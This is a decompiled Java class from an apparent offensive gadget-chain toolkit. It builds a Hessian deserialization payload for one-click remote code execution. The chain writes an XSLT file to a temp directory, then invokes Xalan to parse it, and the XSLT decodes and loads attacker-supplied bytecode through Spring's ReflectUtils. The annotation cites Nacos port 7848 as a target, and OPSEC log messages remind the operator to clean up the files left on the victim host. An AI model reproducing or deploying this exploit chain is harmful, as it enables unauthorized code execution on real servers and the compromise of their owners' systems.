package com.ar3h.chains.gadget.impl.hessian.spring;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.PayloadHelper;
import java.util.LinkedList;
import javax.swing.UIDefaults;
import org.apache.commons.codec.binary.Base64;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.swing.SwingLazyValue;

@GadgetAnnotation(name = "Xslt整合链 一键代码执行", description = "使用JavaUtils写xml文件，之后再调用Process函数解析进行任意代码执行\n可适用于Nacos7848端口RCE场景，但是需要额外的MetadataOperation对象封装，否则该洞导致只能打一次\n注意这里依赖Spring方法：org.springframework.cglib.core.ReflectUtils\n注意执行后会在指定目录下残留两个文件。此链可重复执行，会覆盖之前的Payload文件", dependencies = {"spring-core"})
@GadgetTags(tags = {Tag.HessianDeserialize}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/spring/XsltSpring.class */
public class XsltSpring implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) XsltSpring.class);

    @Param(name = "目标操作系统", description = "可选 {linux, windows}，默认对应路径如下：\nlinux: /tmp/_tomcat_data_temp\nwindows: C:\\Windows\\Temp\\_tomcat_data_temp", type = ParamType.Choice, choices = {@Choice("linux"), @Choice("windows")})
    public String os = "linux";

    @Param(name = "创建目标文件的绝对路径", description = "创建xml文件，测试发现使用相对路径存在问题，建议使用绝对路径", requires = false)
    public String path;
    public String className;
    GadgetContext context;
    static final String xsltTemplate = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:b64=\"http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder\"\nxmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\"\nxmlns:th=\"http://xml.apache.org/xalan/java/java.lang.Thread\"\nxmlns:ru=\"http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils\"\n>\n    <xsl:template match=\"/\">\n      <xsl:variable name=\"bs\" select=\"b64:decodeBuffer(b64:new(),'<base64_payload>')\"/>\n      <xsl:variable name=\"cl\" select=\"th:getContextClassLoader(th:currentThread())\"/>\n      <xsl:variable name=\"rce\" select=\"ru:defineClass('<class_name>',$bs,$cl)\"/>\n      <xsl:value-of select=\"$rce\"/>\n    </xsl:template>\n  </xsl:stylesheet>";

    public Object getObject(byte[] bArr) throws Exception {
        String str = null;
        if ("linux".equalsIgnoreCase(this.os)) {
            str = "/tmp/_tomcat_data_temp";
        } else if ("windows".equalsIgnoreCase(this.os)) {
            str = "C:\\Windows\\Temp\\_tomcat_data_temp";
        } else {
            ThrowsUtil.throwGadgetException("Unsupported os: " + this.os);
        }
        if (this.path != null && !this.path.isEmpty()) {
            str = this.path;
        }
        String str2 = "[OPSEC] you need to clean the target file: " + str;
        String str3 = "[OPSEC] you need to clean the target file: " + str + ".class";
        log.warn(str2);
        log.warn(str3);
        this.context.log(str2);
        this.context.log(str3);
        SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{str, xsltTemplate.replace("<base64_payload>", Base64.encodeBase64String(bArr)).replace("<class_name>", this.className).getBytes()});
        SwingLazyValue swingLazyValue2 = new SwingLazyValue("com.sun.org.apache.xalan.internal.xslt.Process", "_main", new Object[]{new String[]{"-XT", "-XSL", "file://" + str}});
        LinkedList linkedList = new LinkedList();
        linkedList.add(getMap(swingLazyValue));
        linkedList.add(getMap(swingLazyValue2));
        return linkedList;
    }

    public Object getMap(SwingLazyValue swingLazyValue) throws Exception {
        UIDefaults uIDefaults = new UIDefaults();
        UIDefaults uIDefaults2 = new UIDefaults();
        uIDefaults.put("gadget-chains", swingLazyValue);
        uIDefaults2.put("gadget-chains", swingLazyValue);
        return PayloadHelper.makeMap(uIDefaults, uIDefaults2);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        byte[] bArr = (byte[]) gadgetChain.doCreate(gadgetContext);
        this.className = gadgetContext.getString(ContextTag.CLASS_NAME_KEY);
        return getObject(bArr);
    }
}
